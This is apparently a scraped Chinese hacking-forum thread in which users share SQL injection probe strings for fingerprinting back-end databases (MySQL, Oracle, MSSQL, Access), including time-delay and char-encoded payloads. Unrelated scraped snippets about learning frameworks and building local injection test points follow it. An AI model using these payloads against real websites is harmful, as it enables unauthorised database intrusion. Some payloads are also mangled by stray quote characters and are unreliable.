假設這麼乙個注射點:
show.html?id=2
mysql:id=2 and version()>0
oracle:id=2 and 』1′||』1′=』11
其他的歡迎補充
1#upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47
access:
and asc(chr(97))=97
and exists(select id from msysaccessobjects)
sql server:
and exists(select id from sysobjects)
and length(user)>0
mysql:
and length(user())>0
2#xsser (十根**有長短!!) | 2013-02-05 12:48
@upload 如果這些都不是呢…
3#upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03
@xsser 不快速的,延時注入
不知道這樣寫對不對
mssql:id=2 and if(ascii(substring(『name』,1,1))>0)waitfor delay』0:00:3′
mysql:id=2 and select benchmark(1e8,current_date());
4#upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10
最快的貌似是看報錯資訊
oracle error
mssql error
mysql error
5#nimda (你們都是壞銀~) | 2013-02-05 13:14
小菜獻醜來一發 oracle:id=2 and 0<>(select count(*) from dual)
6#upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21
「/*」是mysql中的注釋符,返回錯誤說明該注入點不是mysql,繼續提交如下查詢字元:
「–」是oracle和mssql支援的注釋符,如果返回正常,則說明為這兩種資料庫型別之一。繼續提交如下查詢字元:
「;」是子句查詢識別符號,oracle不支援多行查詢,因此如果返回錯誤,則說明很可能是oracle資料庫。
7#_evil (hackend) | 2013-02-05 13:33
postgresql
8#upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42
切換編碼 and 1=1
oracle:
chr(97) || chr(110) || chr(100) || chr(32) || chr(49) || chr(61) || chr(49)
mssql:
char(97) + char(110) + char(100) + char(32) + char(49) + char(61) + char(49)
mysql:
char(97, 110, 100, 32, 49, 61, 49)
9#xsser (十根**有長短!!) | 2013-02-05 14:31
@upload 比較常見的資料庫這些還是可以判斷的,但是還有其他奇葩型別的呢?
10#upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
@xsser 是奇葩資料庫型別的麼?
根據注入的原理,我們可以猜想,要成功的注入,必須使得注入後的一片和諧,那麼使用該類資料庫特性來判斷,綜上所述:
1.是否可以使用特定的函式來判斷,該資料庫特有的
2.是否可以使用輔助的符號來判斷,如注釋符號、多語句查詢符等等
3.是否可以編碼查詢
4.是否顯可以利用錯資訊
5.是否存在資料庫某些特性輔助判斷
如何快速上手乙個框架
demo 框架 配置 框架介面 生命週期 頁面通訊 元件 基礎元件 擴充套件元件 api 過一遍介紹,知道有哪些坑,怎麼安裝,條件編譯和全域性樣式 詳細查閱配置,以及元件和api的列表標題,跳過具體內容,熟悉大體位置,按需上手。生命週期 基於vue的mvvm框架,熟悉應用週期 頁面週期 元件週期,理...
如何快速接手乙個系統?
常規的做法是看設計文件 了解背景 維護 等。經過這一階段的體會,總結到以下可行的方法。a.先了解基本的框架 類庫的大概作用 b.從配置檔案入手,必須了解每乙個配置的含義,特別是該配置對應功能的實現邏輯。這對於維護系統 討論問題特別重要,如果連乙個配置都不知道,怎麼還能說在維護這個系統?c.把 重要的...
如何構造乙個注入點
在測試過程中,經常需要自己本地構造注入點來進行sql測試,這邊分享一下,不同環境下構造sql注入的 php mysql版 con mysql connect localhost root root if con mysql select db test con id request id query...